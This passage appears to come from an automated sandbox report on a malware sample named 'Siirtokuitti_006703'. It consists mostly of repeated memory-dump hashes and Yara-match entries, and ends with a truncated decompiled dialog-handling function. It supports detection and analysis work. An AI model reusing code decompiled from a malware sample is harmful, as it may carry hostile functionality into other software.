                                                                                                                      • Opcode Fuzzy Hash: 4f0d660fb2fca8b799c393572f9908dffd4b1cf69cff4dac16b3eac6607b7b86
                                                                                                                      • Instruction Fuzzy Hash: F4F17D15D9E3D24EF74352B24A601D13FA4DE239A171A47EB80F3DACA3D19D098B8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b33df6aabbde7e80f99de4229274b720f559ad8d11ae38cf4a7c582d427ffc0b
                                                                                                                      • Instruction ID: d16fe312b7379472b478c858a948a1c819ba864b256d306d1f7595b719b7195a
                                                                                                                      • Opcode Fuzzy Hash: b33df6aabbde7e80f99de4229274b720f559ad8d11ae38cf4a7c582d427ffc0b
                                                                                                                      • Instruction Fuzzy Hash: 8CF16D15D9E3D24EF74352B24A611D13FA4DE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bdd9d3e57e383fca011aea61320180656e2fc38a8f05996afcc08d332eb1f00f
                                                                                                                      • Instruction ID: a1481a33e57e0f082eab4f7df72bb8feebe6bca1dabf5f160f361d8867909fdc
                                                                                                                      • Opcode Fuzzy Hash: bdd9d3e57e383fca011aea61320180656e2fc38a8f05996afcc08d332eb1f00f
                                                                                                                      • Instruction Fuzzy Hash: 8FF17D15D9E3D24EF74352B24A601D13FA4DE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a0dbc4f63481bdd4f74c07016b98108c4931e8556db5b0314b6cfa574e7fda83
                                                                                                                      • Instruction ID: 894fb704dc85ec45b2cf5f62727e17fe112ca1a02c618872053dbb2d34b7c8cb
                                                                                                                      • Opcode Fuzzy Hash: a0dbc4f63481bdd4f74c07016b98108c4931e8556db5b0314b6cfa574e7fda83
                                                                                                                      • Instruction Fuzzy Hash: 3BF17D15D9E3D24EF74352B24A601D13FA4DE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9210e0e177cd030bdb6d6c970261f2fe5fffcb511a2c5d0cb241eac33e738d1e
                                                                                                                      • Instruction ID: a9b9387aa76d595c425144014157e19714ac768879c126baf224dfbe1997e28c
                                                                                                                      • Opcode Fuzzy Hash: 9210e0e177cd030bdb6d6c970261f2fe5fffcb511a2c5d0cb241eac33e738d1e
                                                                                                                      • Instruction Fuzzy Hash: 06F16D15D9E3D24EF74352B24A611D13FA4DE239A171A47EB80F3DACA3D19D098B8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5f599e73a07379319e6bac6ed5adc3bbdf8885ef6a659ad94bd8180d05e7849e
                                                                                                                      • Instruction ID: 63f637d355c66bd9f0f6f2e31de52305450fc2f4478f091f07a2d8ae89a29c3d
                                                                                                                      • Opcode Fuzzy Hash: 5f599e73a07379319e6bac6ed5adc3bbdf8885ef6a659ad94bd8180d05e7849e
                                                                                                                      • Instruction Fuzzy Hash: 3AF16F15D9E3D24EF74352B24A611D13FA4DE239A171A47EB80F3DACA3D19D098B8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: de73060af6bd354572d86fd335544d916cfb07cdbd16efd50d7d7bfbe7cce339
                                                                                                                      • Instruction ID: 5554bd4202edbed751de60bd800f06180c41fc8f3823c1d3e67c38f5c71de5f1
                                                                                                                      • Opcode Fuzzy Hash: de73060af6bd354572d86fd335544d916cfb07cdbd16efd50d7d7bfbe7cce339
                                                                                                                      • Instruction Fuzzy Hash: 94F17D15D9E3D24EF74352B24A611D13FA4DE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fa54f33e7c134d583f4e3f7467e7946509e4fe0e453e4767611e232add650200
                                                                                                                      • Instruction ID: 4b40dd142f8e6d861a0583f3cc595234a256877e45aa8bbc8360da613a4fe02f
                                                                                                                      • Opcode Fuzzy Hash: fa54f33e7c134d583f4e3f7467e7946509e4fe0e453e4767611e232add650200
                                                                                                                      • Instruction Fuzzy Hash: 56F17C15D9E3D24EE74352B24A601D13FA4DE239B170A47EB80F3DACA3D19D0D8B8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 587998d7e64eefcce58e1f09259af72683de0de0587c4c3c3065a972d6d26ba1
                                                                                                                      • Instruction ID: 96e3b99e90a40387498eb00e7352420ec1442c69500bc23e6a23a5d4469dd8a7
                                                                                                                      • Opcode Fuzzy Hash: 587998d7e64eefcce58e1f09259af72683de0de0587c4c3c3065a972d6d26ba1
                                                                                                                      • Instruction Fuzzy Hash: 27F17C15D9E3D24EE74352B24A601D13FA4DE239A170A47EB80F3DACA3D19D0D8F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b20c58e7217436a4b8fb10c6b91adae605fc00ad8bfa001b0d5dc19a6f268283
                                                                                                                      • Instruction ID: 3fa197e9042d9dc74cf877ca04df3c843fc17e7496c78d65627e32abf9fba7d9
                                                                                                                      • Opcode Fuzzy Hash: b20c58e7217436a4b8fb10c6b91adae605fc00ad8bfa001b0d5dc19a6f268283
                                                                                                                      • Instruction Fuzzy Hash: 56E14815D9E3D24EF35352B24A611D13FA4DE239B170A47EB80F3DACA3D19D098B8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e7be70c28143f1486a6d53e58806af1293bd0aaf2b607c3857811a790537b2a2
                                                                                                                      • Instruction ID: f1e6fcd70d95e5f25a788ef0be3d37bbbb26c5d91157b1de02759dfb14c4a025
                                                                                                                      • Opcode Fuzzy Hash: e7be70c28143f1486a6d53e58806af1293bd0aaf2b607c3857811a790537b2a2
                                                                                                                      • Instruction Fuzzy Hash: 7CF17C15D9E3D24EF74352B24A611D13FA4DE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f6bf80999ea72973a98d8ed18d07b49dc3794b3024831bdfb103bfa51f758fa
                                                                                                                      • Instruction ID: fb54baa14897301bbc68a4060b33597a6aba8fe5fd861c21e04402afb8362640
                                                                                                                      • Opcode Fuzzy Hash: 8f6bf80999ea72973a98d8ed18d07b49dc3794b3024831bdfb103bfa51f758fa
                                                                                                                      • Instruction Fuzzy Hash: 5DF17C15D9E3D24EE74352B24A601D13FE4DE239A171A47EB80F3DACA3D19D0D8B8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 69ec1be41b0f1b3d55892b2b999b1b42406c2cb3f3a6a22dd579741047add479
                                                                                                                      • Instruction ID: c599755bd94c9dce31bcda10c02c6fde6f39e39a22b679709719e5720a51afb8
                                                                                                                      • Opcode Fuzzy Hash: 69ec1be41b0f1b3d55892b2b999b1b42406c2cb3f3a6a22dd579741047add479
                                                                                                                      • Instruction Fuzzy Hash: 02F17C15D9E3D24EE74352B24A601D13FA4DE239B171A47EB80F3DACA3D19D098B8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2a6956a079d0ae4937022f6b99b4a2c53d3a4b4b5eedc2943f778044394a26e1
                                                                                                                      • Instruction ID: 01e252b124b7090dee935efba8818249ef907445be10addee26ca33453b985a1
                                                                                                                      • Opcode Fuzzy Hash: 2a6956a079d0ae4937022f6b99b4a2c53d3a4b4b5eedc2943f778044394a26e1
                                                                                                                      • Instruction Fuzzy Hash: B7F17C15D9E3D24EE74352B24A601D13FA4DE239A170A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 50f0d4d5eb22e658ddde971e6018a1017060caee3cc1bdc8f0e5588557c8ce18
                                                                                                                      • Instruction ID: 3a1717314f585ffc4953509b7405ec48c92e5444a05eb6a51340fd05aba86683
                                                                                                                      • Opcode Fuzzy Hash: 50f0d4d5eb22e658ddde971e6018a1017060caee3cc1bdc8f0e5588557c8ce18
                                                                                                                      • Instruction Fuzzy Hash: 50F17D15D9E3D24EF74352B24A601D13FA4DE239A170A47EB80F3DACA3D19D0D8B8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7562d826cd1cd94129fbd7af670c47c8819f6ff4f94222b8fe74f31aaa95186f
                                                                                                                      • Instruction ID: 9dfc3178837387ac0319672996fbd0e42fe6deaf097cfe67b28725ec47b9e554
                                                                                                                      • Opcode Fuzzy Hash: 7562d826cd1cd94129fbd7af670c47c8819f6ff4f94222b8fe74f31aaa95186f
                                                                                                                      • Instruction Fuzzy Hash: D5E13715D9E3D24EE35356B24A601D13FA4DE239A170A47EB80E3DACA3D19D098F8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9d2c45ee53fea930d2324d78c52a9961e3998773754fc188a302a33eba43b630
                                                                                                                      • Instruction ID: 91d7e8efd854ed8deed3d462ea0df3c4b10d973a3d5a97ae48ff5987971b6d9d
                                                                                                                      • Opcode Fuzzy Hash: 9d2c45ee53fea930d2324d78c52a9961e3998773754fc188a302a33eba43b630
                                                                                                                      • Instruction Fuzzy Hash: 25F14815D9E3D24EE35352B24A611D13FA4DE239B170A47EB80F3DACA3D19D098F8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f146cf5c29081a2e4e6ffaf47b693947ec8b3b7860329e2c89737b47441ac87
                                                                                                                      • Instruction ID: ff6d29838fa12154024ad81e19362ba5a5e8566784a3b77df93706d1d7cc1ab8
                                                                                                                      • Opcode Fuzzy Hash: 8f146cf5c29081a2e4e6ffaf47b693947ec8b3b7860329e2c89737b47441ac87
                                                                                                                      • Instruction Fuzzy Hash: 0EF16C15D9E3D24EF74352B24A611D13FA4DE239A170A47EB80F3DACA3D19D098B8772
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: de882090f265dc073b3a6d890b1d0e6ce6b4c174db907ecea46e6f13d56f2ddc
                                                                                                                      • Instruction ID: 743acae559e1cf3bc74ddd2301f01a2715aa14d5a33d1a2ec0d4a9245faeece8
                                                                                                                      • Opcode Fuzzy Hash: de882090f265dc073b3a6d890b1d0e6ce6b4c174db907ecea46e6f13d56f2ddc
                                                                                                                      • Instruction Fuzzy Hash: 6FF15815D9E3D24EF35352B24A611D13FA4DE239A170A47EBC0E3DACA3D19D098B8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 84ab874938533a9aaf4051180b15c0849048491ecec13a86cd301ea8d467808c
                                                                                                                      • Instruction ID: 0641c889cc131e4d2d502238067e6b96ca314c0eff3f184b2ca0b1afc939561a
                                                                                                                      • Opcode Fuzzy Hash: 84ab874938533a9aaf4051180b15c0849048491ecec13a86cd301ea8d467808c
                                                                                                                      • Instruction Fuzzy Hash: 3CF15B15D9E3D24EF35352B24A601D13FA4DE239A171A47EB80F3DACA3D19D098F8672
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                      • Instruction ID: daf8ce1acd545a7b877246d68f968f9f4e6f03ccf04a4df008e71f52bef3e4b9
                                                                                                                      • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                      • Instruction Fuzzy Hash: A8026E73E547164FE720DE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a2b4654cc286a7c9b098183277bbccaa6aca134b2a95ad7874fdedb65878dc35
                                                                                                                      • Instruction ID: 1211c81df0b533dcecfe08d8a6c8a9746ae9fcea1bfb550fc183b656e8b260ba
                                                                                                                      • Opcode Fuzzy Hash: a2b4654cc286a7c9b098183277bbccaa6aca134b2a95ad7874fdedb65878dc35
                                                                                                                      • Instruction Fuzzy Hash: B3C16432919789CFE706DF38D88AB413FF6F746324B48424ED4A193592C735662ACF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b7b771bd7e19cd769109e13dc4d3cb3ac0109268e38f94a2ff77b802795e0e13
                                                                                                                      • Instruction ID: ae8dfcdd692a669a2c70eeb070c5a3fd67f9e2025653621ac273c15dcabcbc76
                                                                                                                      • Opcode Fuzzy Hash: b7b771bd7e19cd769109e13dc4d3cb3ac0109268e38f94a2ff77b802795e0e13
                                                                                                                      • Instruction Fuzzy Hash: 62916232A19385DFEB02DF39D88AB413FB6F746328B08474ED9A193591C7346566CF81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a48c2b1bc5d3cda8b4c816b8ad8188542f91935ef3a3bcad10b3cbbe15a56265
                                                                                                                      • Instruction ID: a3470c50926836fc3c656c5cf026dd62b4af17969718c24afd115e3fab381769
                                                                                                                      • Opcode Fuzzy Hash: a48c2b1bc5d3cda8b4c816b8ad8188542f91935ef3a3bcad10b3cbbe15a56265
                                                                                                                      • Instruction Fuzzy Hash: D2814F32919385DFEB02DF78D88AB413FB5F706328B48474ED9A093591C734652ACF85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                      • Instruction ID: d068d634f8cd0c8e715418820047356230f027f073fe596d74c4776de8764bc9
                                                                                                                      • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                      • Instruction Fuzzy Hash: 1D5171B3E14A214BD3188E09CC40671B792FFC8312B5F81BADD199B397CE74E9529A90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e26538a769e99760d12926a6ebe3fecd59df1141204e9d30ce915d188a0bc3f4
                                                                                                                      • Instruction ID: 1356e54b73b5ee5ccedde766fbee98afa2048befc750b9e73cbe67aa83646f0d
                                                                                                                      • Opcode Fuzzy Hash: e26538a769e99760d12926a6ebe3fecd59df1141204e9d30ce915d188a0bc3f4
                                                                                                                      • Instruction Fuzzy Hash: DA51F9324697958FD716CF3ADAAAA813FB0F352360748434AC9A29B4E1C370655ADB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                      • Instruction ID: e555565f04a3e509edfc68b9b3145f22d37b3efd29dc40182ee3dbd6422321f5
                                                                                                                      • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                      • Instruction Fuzzy Hash: 2031625165D6F14DD31E436D08BD675AEC28E5720174EC2FEDADA5F2F3C4888408D3A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eb6753a0dcb5b786526612ab9dd9f239d5a7f32af6e011b2d03355a4c22664b1
                                                                                                                      • Instruction ID: c276e84d0ae8bb462207bd03c30e8c03dbb3bd143cea9de5746723944a64babb
                                                                                                                      • Opcode Fuzzy Hash: eb6753a0dcb5b786526612ab9dd9f239d5a7f32af6e011b2d03355a4c22664b1
                                                                                                                      • Instruction Fuzzy Hash: 5231D272B106265BD354CE3AD880656F7E2FB88350B548739D918C3B40E774F961CBD0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E004044E2(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				int _v12;
                                                                                                                      				void* _v16;
                                                                                                                      				struct HWND__* _t56;
                                                                                                                      				signed int _t75;
                                                                                                                      				signed short* _t76;
                                                                                                                      				signed short* _t78;
                                                                                                                      				long _t92;
                                                                                                                      				int _t103;
                                                                                                                      				signed int _t110;
                                                                                                                      				intOrPtr _t113;
                                                                                                                      				WCHAR* _t114;
                                                                                                                      				signed int* _t116;
                                                                                                                      				WCHAR* _t117;
                                                                                                                      				struct HWND__* _t118;
                                                                                                                      
                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                      					if(_a8 != 0x111) {
                                                                                                                      						L13:
                                                                                                                      						if(_a8 != 0x4e) {
                                                                                                                      							if(_a8 == 0x40b) {
                                                                                                                      								 *0x4216f4 =  *0x4216f4 + 1;
                                                                                                                      							}
                                                                                                                      							L27:
                                                                                                                      							_t114 = _a16;
                                                                                                                      							L28:
                                                                                                                      							return E004043AC(_a8, _a12, _t114);
                                                                                                                      						}
                                                                                                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                                                      						_t114 = _a16;
                                                                                                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                                                      							_v12 = _t103;
                                                                                                                      							_v16 = _t113;
                                                                                                                      							_v8 = 0x4281e0;
                                                                                                                      							if(_t103 - _t113 < 0x800) {
                                                                                                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                                                      								SetCursor(LoadCursorW(0, 0x7f02));
